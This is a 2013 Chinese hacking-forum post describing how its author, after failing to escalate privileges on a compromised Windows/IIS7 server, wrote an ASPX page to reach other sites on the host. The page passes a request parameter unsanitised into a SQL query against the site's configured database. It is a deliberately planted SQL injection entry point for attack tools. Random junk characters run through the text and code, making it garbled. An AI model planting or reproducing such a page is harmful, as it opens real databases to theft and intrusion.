标题: 利用aspx构造注射来跨站 [打印本页] 作者: admin 时间: 2013-3-20 21:32 标题: 利用aspx构造注射来跨站 昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。! ?1 }1 F6 }( K! d/ a6 k7 t6 O' T
其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。0 n6 f! N) w/ D$ ~
代码量不多,自己写个拉倒了。烦死了。1 s) I% a' t" L3 f' c! {+ x
" O+ Z3 r7 U0 G( V5 g( T, }- }5 d5 r8 E* ]. m
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">% n$ ?- c# J& N, P. V( H
<html xmlns="http://www.w3.org/1999/xhtml"> / m$ A2 B% L$ j. T( a3 _5 n9 _<head runat="server">6 p& v& c. R1 x* B; W' q5 L
<title>暗影aspx构造注射专用页面</title>! e: y3 N& Z) X. D, d' m% _* l
</head> 4 v2 V9 I- N" n; C: E" F2 ^7 w<body> 3 g! N) m6 M7 A/ n <form id="form1" runat="server">: O3 G* ^6 d1 e& |& V3 F
<div>8 ?) b. @$ F& k* p! j- o
<script language="c#" runat="server"> + y8 i9 K) K& [: I7 k5 L / a1 s3 l6 p% ^5 Y; b# i
void page_init(object sender, EventArgs e)6 j7 ^/ q9 Q. _( O$ c( v7 L1 ?8 ~3 g
{! _* Z& Z$ P W. t) r
( h' d4 _& F6 ~' y$ F* |
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection(); , Z8 a5 D0 R; z8 i8 L4 b . T8 S7 S# a* j( c8 O$ X; C conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString(); S& u) F0 N/ g; G conn.Open(); * U n {/ c4 ^5 @0 \1 L( g ! \; @8 x; X- g/ k: B
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1 $ W* x7 \1 f0 `& _' f+ ^ & P. J" \: x% l* z
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn); & C8 @: T8 d2 y% N/ \/ h4 d int x = command.ExecuteNonQuery(); , [% e; Z7 E: e( q9 J+ _ Response.Write(i+"\n"); + W1 {- ~( D/ _# m Response.Write(x);/ F3 k% b3 t# ^1 P) r
conn.Close(); 5 Y# ^8 o7 u" D' `2 F }9 a! P: h. n0 w
8 e8 X- u, n' d. t. Y" f </script>* r. G; f$ d1 A3 C% p
</div> " i6 e3 e8 }9 ^# g* f5 G </form> . ^( `7 n; u c& z</body>& S% O" t* S$ ?5 [# N2 Z3 ]- @1 Y6 Z
</html>) n' l+ T* u6 U: L" S